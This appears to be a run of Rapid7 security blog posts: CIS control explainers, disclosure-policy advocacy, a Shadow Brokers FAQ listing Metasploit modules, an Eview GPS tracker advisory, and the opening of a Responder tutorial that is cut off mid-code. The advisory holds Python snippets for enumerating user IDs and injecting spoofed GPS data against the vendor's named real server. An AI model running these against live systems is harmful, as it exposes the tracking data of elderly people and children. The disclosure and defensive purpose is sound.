Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities. Control 4 challenges you to understand why vulnerability management and remediation is important to your overall security maturity. Learn more.

 

Control 5: Controlled Use of Administrative Privilege

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk.  Discover how reducing or controlling administrative privilege and access can reduce the risk of an attacker compromising your sensitive information. Learn more.

 

Control 6: Maintenance, Monitoring and Analysis of Audit Logs

This control has six sections which cover everything from NTP configuration to verbose logging of traffic from network devices, how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies. Learn more.

 

Control 7: Email and Web Browser Protection

Critical Control 7 has eight sections that cover the basics of browser and email client safety, secure configuration and mail handling at the server level. The control pays specific attention to concepts like scripting and active component limiting in browsers and email clients, attachment handling, configuration, URL logging, filtering and whitelisting. The premise of the control is fairly straightforward: browser and email client security are critically important for low-level risk mitigation. Learn more.

 

Control 8: Malware Defenses

Control 8 covers malware and antivirus protection at system, network, and organizational levels. It isn’t limited to workstations, since even servers that don't run Windows are regularly targeted (and affected) by malware. Control 8 should be used to assess infrastructure, IoT, mobile devices, and anything else that can become a target for malicious software—not just endpoints. Learn more.

Rapid7 has long been a champion of coordinated vulnerability disclosure and handling processes as they play a critical role in both strengthening risk management practices and protecting security researchers. We not only use coordinated disclosure processes in our own vulnerability disclosure and receiving activities, but also advocate for broader adoption in industry and in government policies.

 

Building on this, we recently joined forces with other members of the security community to urge NIST and NTIA (both part of the U.S. Dept. of Commerce) to promote adoption of coordinated vulnerability disclosure processes. In each of these two most recent filings, Rapid7 was joined by a coalition of approximately two dozen (!!) like-minded cybersecurity firms, civil society organizations, and individual researchers.

 

  • Joint comments to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, available here.

 

  • Joint comments to the National Telecommunications and Information Administration's (NTIA) "Green Paper" on the Internet of Things, available here.

 

The goal of the comments is for these agencies to incorporate coordinated vulnerability disclosure and handling processes into official policy positions on IoT security (in the case of NTIA) and cybersecurity guidance to other organizations (in the case of NIST). We hope this ultimately translates to broader adoption of these processes by both companies and government agencies.

 

What are "vuln disclosure processes" and why are they important?

Okay, first off, I really hope infosec vernacular evolves to come up with a better term than "coordinated vulnerability disclosure and handling processes" because boy that's a mouthful. But it appears to be the generally agreed-upon term.

 

A coordinated vulnerability disclosure and handling process is basically an organization's plan for dealing with security vulnerabilities disclosed from outside the organization. They are formal internal mechanisms for receiving, assessing, and mitigating security vulnerabilities submitted by external sources, such as independent researchers, and communicating the outcome to the vulnerability reporter and affected parties. These processes are easy to establish (relative to many other security measures) and may be tailored for an organization's unique needs and resources. Coordinated vulnerability disclosure and handling processes are not necessarily "bug bounty programs" and may or may not offer incentives, or a guarantee of protection against liability, to vulnerability reporters.

 

Why are these processes important? The quantity, diversity, and complexity of vulnerabilities will prevent many organizations from detecting all vulnerabilities without independent expertise or manpower. When companies are contacted about vulnerabilities in their products or IT from unsolicited third parties, having a plan in place to get the information to the right people will lead to a quicker resolution. Security researchers disclosing vulnerabilities are also better protected when companies clarify a process for receiving, analyzing, and responding to the disclosures – being prepared helps avoid misunderstandings or fear that can lead to legal threats or conflicts.

 

To catch vulnerabilities they might otherwise overlook, businesses and government agencies are increasingly implementing vulnerability disclosure and handling processes, but widespread adoption is not yet the norm.

 

NIST Framework comments

The NIST Framework is a voluntary guidance document for organizations for managing cybersecurity risks. The Framework has seen growing adoption and recognition, and is an increasingly important resource that helps shape cybersecurity implementation in the public and private sectors. NIST proposed revisions to the Framework and solicited comments to the revisions.

 

In our joint comments, the coalition urged NIST to expressly incorporate vulnerability disclosure processes into the Framework. The Framework already included "external participation" components and metrics (likely directed at formal cyber threat intel sharing arrangements), but they are unclear and don't explicitly refer to vulnerability disclosure processes.

 

Specifically, our comments recommended that the Framework Core include a new subcategory dedicated to vulnerability disclosure processes, and to build the processes into existing subcategories on risk assessment and third party awareness. Our comments also recommended revising the "external participation" metric of the Framework Tiers to lay out a basic maturity model for vulnerability disclosure processes.

 

NTIA Internet of Things "Green Paper" comments

NTIA issued a “Green Paper” in late 2016 to detail its overall policies with regard to the Internet of Things, and then they solicited feedback and comments on that draft. Although the Dept. of Commerce has demonstrated its support for vulnerability disclosure and handling processes, there was little discussion about this issue in the Green Paper. The Green Paper is important because it will set the general policy agenda and priorities for the Dept. of Commerce on the Internet of Things (IoT).

 

In our joint comments, the coalition urged NTIA to include more comprehensive discussion of vulnerability disclosure and handling processes for IoT. This will help clarify and emphasize the role of vulnerability disclosure in the Dept. of Commerce's policies on IoT security going forward.

 

The comments also urged NTIA to commit to actively encouraging IoT vendors to adopt vulnerability disclosure and handling processes. The Green Paper mentioned NTIA's ongoing "multistakeholder process" on vulnerability disclosure guidelines, which Rapid7 participates in, but the Green Paper did not discuss any upcoming plans for promoting adoption of vulnerability disclosure and handling processes. Our comments recommended that NTIA promote adoption among companies and government agencies in IoT-related sectors, as well as work to incorporate the processes into security guidance documents.

 

More coming

Rapid7 is dedicated to strengthening cybersecurity for organizations, protecting consumers, and empowering the independent security research community to safely disclose vulnerabilities they've discovered. All these goals come together on the issue of coordinated vulnerability disclosure processes. As we increasingly depend on complex and flawed software and systems, we must pave the way for greater community participation in security. Facilitating communication between technology providers and operators and independent researchers is an important step toward greater collaboration aimed at keeping users safe.

 

Rapid7 is thrilled to be working with so many companies, groups, and individuals to advance vulnerability disclosure and handling processes. As government agencies consider how cybersecurity fits into their missions, and how to advise the public and private sectors on what to do to best protect themselves, we expect more opportunities to come.

 

You can learn more about our policy engagement efforts on Rapid7's public policy page.

The Rapid7 team has been busy evaluating the threats posed by last Friday’s Shadow Broker exploit and tool release and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.


What’s the story?

On Friday, April 15, a hacking group known as the “Shadow Brokers” released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools.


This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month.

 

Who are these shady characters?

The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as Equation Group. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.

 

The April 15th release seems to be the culmination of the Shadow Brokers’ activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.

 

Should you be worried?

A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the vulnerabilities, so a very good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check. 


If you are unsure if you are up to date on these patches, we have checks for them all in Rapid7 Nexpose and Rapid7 InsightVM. These checks are all included in the Microsoft hotfix scan template.

 

  • EternalBlue, EternalSynergy, EternalRomance, EternalChampion (MS17-010): msft-cve-2017-0143, msft-cve-2017-0144, msft-cve-2017-0145, msft-cve-2017-0146, msft-cve-2017-0147, msft-cve-2017-0148
  • EmeraldThread (MS10-061): WINDOWS-HOTFIX-MS10-061
  • EskimoRoll (MS14-068): WINDOWS-HOTFIX-MS14-068
  • EducatedScholar (MS09-050): WINDOWS-HOTFIX-MS09-050
  • EclipsedWing (MS08-067): WINDOWS-HOTFIX-MS08-067

 

If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in Rapid7 Metasploit:

 

  • EternalBlue (MS17-010): auxiliary/scanner/smb/smb_ms17_010
  • EmeraldThread (MS10-061): exploit/windows/smb/psexec
  • EternalChampion (MS17-010): auxiliary/scanner/smb/smb_ms17_010
  • EskimoRoll (MS14-068 / CVE-2014-6324): auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  • EternalRomance (MS17-010): auxiliary/scanner/smb/smb_ms17_010
  • EducatedScholar (MS09-050): auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index
  • EternalSynergy (MS17-010): auxiliary/scanner/smb/smb_ms17_010
  • EclipsedWing (MS08-067): auxiliary/scanner/smb/ms08_067_check, exploits/windows/smb/ms08_067_netapi

 

In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.

 

What else can you do to protect yourselves?

If patching is still in progress or will take a little bit longer to fully implement (we get it), then there are detections for the exploits that you can implement while patching is underway. For examples of ways to implement detections, check out this blog post from Mike Scutt.

 

Rapid7 InsightIDR, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this 4-min Solution Short.

 

It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak.

 

What about that IIS 6 box we have on the public internet?

It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (“EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.

 

Should you be worried about the Equation Group?

The threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky’s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.

 

While that is good news for most organizations, that doesn’t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals. This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it takes criminals to incorporate exploits into their existing operations. It will not be long before we start to see more widespread attacks using these tools.


Where should I build my underground bunker?

While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn’t it.

 


It’s the $64,000 question in security – both figuratively and literally: where do you spend your money? Some people vote, at least initially, for risk assessment. Some for technology acquisition. Others for ongoing operations. Smart security leaders will cover all the above and more. It’s interesting though – according to a recent study titled the 2017 Thales Data Threat Report, security spending is still a bit skewed. For instance, security compliance is the top driver of security spending. One would think that business risk and common sense would be core drivers but we all know how the world works.

 

The Thales study also found that network and endpoint security were respondents' top spending priorities, yet 30 percent of respondents say their organizations are 'very vulnerable' or 'extremely vulnerable' to security attacks. So, people are spending money on security solutions that may not be addressing their true challenges. Perhaps more email phishing testing needs to be performed. I’m finding that to be one of the most fruitful exercises anyone can do to improve their security program – as long as it’s being done the right way. Maybe more or better security assessments are required. Only you – and the team of people in charge of security – will know what’s best. 

 

The mismatch of security priorities and spending is something I see all the time in my work. Security policies are documented, advanced technologies are implemented, and executives assume that all is well with security given all the effort and money being spent. Yet, ironically, in so many cases not a single vulnerability scan has been run, much less a formal information risk assessment performed. Perhaps testing has been done, but maybe it wasn't the right type of testing. Or the right technologies have been installed, but their implementation is sloppy or under-managed.

 

This mismatch is an issue that’s especially evident in healthcare (i.e. HIPAA compliance checkbox) but affects businesses large and small across all industries. It’s the classic case of putting the cart before the horse. I strongly believe in the concept of “you cannot secure what you don’t acknowledge”. But you first have to properly acknowledge the issues – not just buy into them because they’re “best practice”. Simply going through the motions and spending money on security will make you look busy and perhaps demonstrate to those outside of IT and security that something is being done to address your information risks. But that’s not necessarily the right thing to do.

 

The bottom line: don't spend that hard-fought $64,000 on security just for the sake of security. Step back. Know what you've got, understand how it's truly at risk, and then, and only then, should you do something about it. Look at the bigger picture of security – what it means for your organization and how it can best be addressed based on your specific needs rather than what someone else is eager to sell you.

Seven issues were identified with the Eview EV-07S GPS tracker, which can allow an unauthenticated attacker to identify deployed devices, remotely reset devices, learn GPS location data, and modify GPS data. Those issues are briefly summarized in the table below.

 

These issues were discovered by Deral Heiland of Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

 

| Vulnerability Description | R7 ID | CVE | Exploit Vector |
| --- | --- | --- | --- |
| Unauthenticated remote factory reset | R7-2016-28.1 | CVE-2017-5237 | Phone number |
| Remote device identification | R7-2016-28.2 | None (identification) | Phone number range |
| Lack of configuration bounds checks | R7-2016-28.3 | CVE-2017-5238 | Phone number |
| Unauthenticated access to user data | R7-2016-28.4 | None (server-side issue) | Web application |
| Authenticated user access to other users' data | R7-2016-28.5 | None (server-side issue) | Web application user account |
| Sensitive information transmitted in cleartext | R7-2016-28.6 | CVE-2017-5239 | Man-in-the-Middle (MitM) network |
| Web application data poisoning | R7-2016-28.7 | None (server-side issue) | Web application |

 

Product Description

The EV-07S is a personal GPS tracker device used for personal safety and security, described at the vendor's website as being primarily intended for tracking elderly family members; disabled and patient care; child protection; employee management; and pet and animal tracking. Test devices were acquired from Eview directly, and an example is shown below in Figure 1.

f1.png

Figure 1: The EV-07S personal GPS tracker device

 

R7-2016-28.1: Unauthenticated remote factory reset

Given knowledge of the EV-07S's registered phone number, the device can be reset to factory default settings by sending "RESET!" as a command in an SMS message to the device. Only the phone number is required; no password or physical access is needed to accomplish this. After a factory reset, the device can then be reconfigured remotely via SMS messages without a password. The product manual documents this functionality, so it appears to be a fundamental design flaw with regard to secure configuration.

 

Mitigation for R7-2016-28.1

A vendor-supplied patch should prevent the device from performing an unauthenticated factory reset; the reset should require either the configured password or physical access to the device.

 

Absent a patch, users should regularly check their device to ensure the configuration has not been deleted or altered.

 

R7-2016-28.2: Remote device identification

The EV-07S device, once set up with a password, should not respond to any SMS queries sent to the device's phone number. According to the user manual, no password is needed to send the "reboot" and "RESET!" commands to the device. Testing showed that, in spite of the user manual's statement, the "reboot" command does require a password if the device is set up for authentication. Further manual fuzzing via SMS revealed that the command "REBOOT!" causes the device to respond with the message "Format error!".

 

Because the device returns this error response even when password protection is enabled, a malicious actor could enumerate deployed devices by sending SMS messages containing the "REBOOT!" command to a range of likely phone numbers, commonly known as a war dialing operation.

 

f2.png

Figure 2: SMS command response on password protected device

 

Mitigation for R7-2016-28.2

A vendor-supplied patch should disable the response from the "REBOOT!" command when password protection is enabled.

 

R7-2016-28.3: Lack of configuration bounds checks

Several configuration fields do not perform proper bounds checks on incoming SMS messages. If a device's phone number is known to an attacker, this lack of bounds checking allows an overly long input for one configuration setting to overwrite the data of another setting. An example of this is shown in Figure 3, where the "Authorized Number" setting A1 is used to overwrite setting B1:

 

f3.png

Figure 3: Configuration Setting Overflow Via SMS Message

 

Mitigation for R7-2016-28.3

A vendor-supplied patch should implement bounds checks and input sanitization on all entered configuration data.

 

Absent a vendor-supplied patch, users should avoid entering values of excessive length. In the case of the Authorized Number setting, anything over 20 characters will overwrite the next setting in line.
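As a rough sketch of the bounds checking such a patch would need (the field names, per-field limits beyond the 20-character Authorized Number observation, and the error reply are assumptions for illustration, not vendor behavior):

```python
# Illustrative only: the sort of length check a firmware patch could apply before
# storing a configuration value received over SMS. The 20-character limit reflects
# the Authorized Number behavior described above; everything else is assumed.
MAX_LENGTHS = {"authorized_number": 20}  # hypothetical per-field limits

def set_config(field, value, store):
    """Store a setting only if it fits within its declared bounds."""
    limit = MAX_LENGTHS.get(field)
    if limit is None or len(value) > limit:
        return "Format error!"  # reject rather than overflow into the next setting
    store[field] = value
    return "OK"

settings = {}
print(set_config("authorized_number", "+15555550100", settings))  # OK
print(set_config("authorized_number", "A" * 40, settings))        # Format error!
```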

 

R7-2016-28.4: Unauthenticated access to user data

A malicious actor can gain access to user data including account name, TrackerID, and device IMEI. This is done by posting userId=5XXXX&trackerName=&type=allTrackers, with the target's userId number, to the API at http://www.smart-tracking.com/web/searchTrackerList.do . An example of this is shown below in Figure 4:

 

f4.png

Figure 4: HTTP post to gain access to user data

 

Given the small keyspace involved in guessing valid 5-digit user IDs, it appears trivial to enumerate all valid user IDs.
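To illustrate how little an attacker needs here, the request described above can be reproduced in a few lines. This is a hedged sketch only: the endpoint and POST parameters come from the advisory, while the 5-digit ID range and the response handling are assumptions.

```python
# Sketch of the unauthenticated request described above. The endpoint and
# parameters are from the advisory; the ID range and response check are assumed.
import requests

URL = "http://www.smart-tracking.com/web/searchTrackerList.do"

def lookup_user(user_id):
    """POST a candidate userId with no authentication and return the raw response."""
    resp = requests.post(
        URL,
        data={"userId": str(user_id), "trackerName": "", "type": "allTrackers"},
        timeout=10,
    )
    return resp.text

# Walking the assumed 5-digit keyspace (the "5XXXX" example above) is trivial:
# for uid in range(50000, 60000):
#     body = lookup_user(uid)
#     if body.strip():  # non-empty responses likely contain account/tracker data
#         print(uid, body[:120])
```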

 

Mitigation for R7-2016-28.4

A vendor-supplied patch on the vendor web application should prevent unauthenticated access to individual user data.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.5: Authenticated access to other users' data

An authenticated user can gain access to other users' configuration and device GPS data if they know or guess a valid userId, device IMEI, or TrackerID. The following three examples (Figures 5 through 7) show one authenticated account accessing another account's data.

 

f5.png

Figure 5: Access to another user's configuration data

 

f6.png

Figure 6: Access to another user's device GPS data

 

f7.png

Figure 7: Access to another user's GPS tracker configuration

 

Mitigation for R7-2016-28.5

A vendor-supplied patch should prevent access to other users' data.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.6:  Sensitive information transmitted in cleartext

The realtime tracking web application, hosted at http://www.smart-tracking.com , does not utilize SSL/TLS encryption for its HTTP services. In addition, the EV-07S device passes IMEI and GPS data to this website over the Internet on TCP port 5050 without any encryption. An example of this captured unencrypted data is shown below in Figure 8:

 

f8.png

Figure 8: Unencrypted Transfer of Information From Device Over Port 5050

 

Mitigation for R7-2016-28.6

A vendor-supplied patch on both the server and the client should enable encrypted transfer of device data to the website, along with an update to the website to enable HTTPS and serve these pages only over HTTPS.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.7:  Data poisoning

An unauthenticated attacker can poison the realtime tracking data by injecting device data, similar to the data structure shown above in Figure 8, to the server at www.smart-tracking.com over TCP port 5050. The attacker can do this only if they know a device's IMEI number, but that data is learnable through the mechanisms described above.
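A skeleton of the injection path looks like the following. Note the heavy caveat: the advisory only establishes that the server accepts unauthenticated device data on TCP port 5050; the payload below is a placeholder, not the real EV-07S wire format.

```python
# Skeleton of the unauthenticated injection path described above. The host and
# port come from the advisory; FAKE_REPORT is a placeholder, not the real
# EV-07S wire format, which is intentionally not reproduced here.
import socket

SERVER = ("www.smart-tracking.com", 5050)
FAKE_REPORT = b"<device IMEI and spoofed GPS coordinates in the device's own format>"

with socket.create_connection(SERVER, timeout=10) as sock:
    sock.sendall(FAKE_REPORT)  # the server requires no authentication to accept this
```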

 

An example of this is shown in Figure 9, where the device's realtime tracking data was poisoned to make the device appear to be in Moscow, Russia (it was not).

 

f9.png

Figure 9: Real time tracking data poisoned

 

Mitigation for R7-2016-28.7

A vendor-supplied patch should enable authentication before allowing device data to be posted to the site on TCP port 5050.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

Disclosure Timeline

  • Mon, Dec 12, 2016: Initial contact made to the vendor.
  • Tue, Dec 20, 2016: Vendor responded and details provided to info@eviewltd.com.
  • Tue, Dec 27, 2016: Disclosure to CERT/CC, VU#375851 assigned.
  • Wed, Mar 08, 2017: CVEs assigned in conjunction with CERT/CC.
  • Mon, Mar 27, 2017: Vulnerability disclosure published.

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren't thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk. That makes it an important control, and the conversation around why it matters is just as important. We'll talk about both.

 

Misuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or picks up malware from a drive-by website that loads silently in the background. Privileged accounts make these attacks succeed quickly: the user's machine can be controlled, keylogging can be installed, or running malicious processes can be hidden from view.

 

The second common technique is the elevation of privilege when guessing or cracking a password for an administrative user and gaining access on a target machine. Especially if the password policy is weak (8 characters is not sufficient!) or not enforced, the risk increases.

 

What it is

Reducing administrative privilege specifically means not running services or accounts with admin-level access all the time. This does not mean that no one should have admin; it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically tasks, require it.

 

Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?

 

 

How to implement it

There are a lot of different ways to implement restrictions on admin privilege. You are first going to have to deal with the political issues of why to do this. Trust me, addressing this up front saves you a lot of heartache later on.

 

The political stuff

Case #1: All users have admin, either local admin and/or admin account privileges

 

My first question, when I see this happening in any organization, is “why do they need this?”

 

Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely, the app just might be installed improperly.]
  • They need it to print !!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]

 

Some of these are valid responses. The problem is that we don't understand the root issue driving the belief that everyone needs admin-level access to do their daily duties. And this is probably true of many organizations. It's simpler just to give admin access because things will then work, but you create loads of risk when you do. You have to take the time to determine which functions actually need the access, and remove it from those functions that don't, to lower the risk and the attack surface.

 

All of these responses speak to worries about not being able to perform a business function when needed. They also imply that the people in charge of approving these permissions don't really understand the risks associated with granting them. We need to get them to understand the relatively low cost of occasionally needing admin rights versus the much higher risk of having them when attackers strike.

 

Case #2: Your admins say they have to have it “to do their jobs”

 

I don’t disagree with this statement. Admins do need admin rights to do some tasks. But not every task calls for it. Do this exercise: list all the daily tasks an admin does on an average day. Then, mark each task which does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins, and require them to use it for all those tasks that are marked. For all other tasks, they escalate into their admin account and then de-escalate when done. It's an extra step, and it is a secure one.

 

The conversation


Now have the conversation. It may be painful. I have actually been in meetings where people got so mad they threw things, or were in tears when we told them we were "taking away" their privilege. This is why we say "reducing" or "controlling." These are important words. The phrase is "we're reducing/controlling risk by allowing you to use your privilege only for tasks that require it." For executives who demand admin, point out that they are among the highest risks to the organization due to their status and are frequently high-value targets sought by attackers.

 

Then you support your conversation with information from around the web, whitepapers, studies, anything that helps drive your point.

 

For example, this article from Avecto reports that 97% of critical Windows vulnerabilities are mitigated by reducing admin privilege, allowing you to focus on the remaining 3% and be more effective. Search around; there's lots more good supporting material.

 

This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give administrative privilege to users for specific tasks, like delegating to your help desk the ability to disable accounts or move them to different OUs. They don't need full admin to do this. On Linux systems, using sudo instead of working interactively as root is much less risky.

 

If you are a compliance-driven organization, most compliance requirements state reduction of admin is required as part of access controls. Here’s a brief glimpse of some compliance requirements that are addressed by Control 5:

 

  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7

 

  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.

 

  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls

 

The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS critical security controls, can reduce the risks in your organization by 80% or more, allowing you to focus on the remaining 20%. It's very likely the risk reduction is even higher! The Australian Signals Directorate lists reducing admin privilege in its Top 4 Mitigation Strategies, along with elements from Control 2 (application whitelisting) and Control 4 (an ongoing patching program).

 

Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.

 

For Linux environments, each sysadmin should have a separate account. Enforce use of the 'su' command to gain root; better yet, disable su and enforce the use of the 'sudo' command.

 

There are also third parties who sell software that can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust PowerBroker, or Thycotic Privilege Manager. Note that Rapid7 does not partner with these companies, but we recommend them based on what we see other organizations deploying.

 

All the other things

As with most of the controls, the sub-controls also list other precautions.

 

  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. A use case: if an admin leaves for vacation, monitor their account, and any login attempt triggers an investigation. (A minimal scripted version of this idea is sketched after this list.)
  • As an advanced control, perform admin tasks only from dedicated machines that are segregated from the rest of the network and connect only to the systems they need to administer.
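As a minimal sketch of the alerting idea mentioned in the list above (assuming a Linux syslog-style auth.log; the log path, account names, and message format are assumptions, and a real deployment would rely on a SIEM such as InsightIDR rather than a one-off script):

```python
# Minimal illustration of alerting on failed logins to privileged accounts.
# Log path, account names, and log format are assumptions for this sketch.
import re
import time

AUTH_LOG = "/var/log/auth.log"
ADMIN_ACCOUNTS = {"root", "admin-jsmith"}          # hypothetical privileged accounts
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+)")

def follow(path):
    """Yield new lines appended to the file, tail -f style."""
    with open(path) as fh:
        fh.seek(0, 2)                               # start at the end of the file
        while True:
            line = fh.readline()
            if not line:
                time.sleep(1)
                continue
            yield line

for line in follow(AUTH_LOG):
    match = FAILED.search(line)
    if match and match.group(1) in ADMIN_ACCOUNTS:
        print("ALERT: failed admin login:", line.strip())  # e.g. page the on-call
```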

 

Reducing or controlling admin is not hard to implement. However, it is a change to the way things are being done, and fear of change is very powerful. Do your best to have conversations to ease the fear. You are not taking anything away. You are simply making it harder for errors with a large impact to occur, and you are reducing the risk that an attacker can easily compromise an account, a system, fileshares, sensitive data, and more.

 

Related Resources

 

CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun

 

Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.

 

 

An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages (Try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository, located at https://github.com/lgandx/Responder.

 

Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:

 

Due to the client viewing any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once received, the client then sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works - we’ve seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early within an internal engagement’s timeline.
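To make the mechanism concrete, the following sketch shows only the listening half of what Responder does: joining the LLMNR multicast group and printing the hostnames clients broadcast when local DNS can't answer. It is not Responder itself and sends no spoofed replies; crafting the poisoned answer and capturing the resulting NTLM authentication is what Responder layers on top of this.

```python
# Stripped-down LLMNR listener: shows the broadcast queries Responder poisons.
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", LLMNR_PORT))
mreq = struct.pack("4s4s", socket.inet_aton(LLMNR_GROUP), socket.inet_aton("0.0.0.0"))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

while True:
    data, (src_ip, _) = sock.recvfrom(1024)
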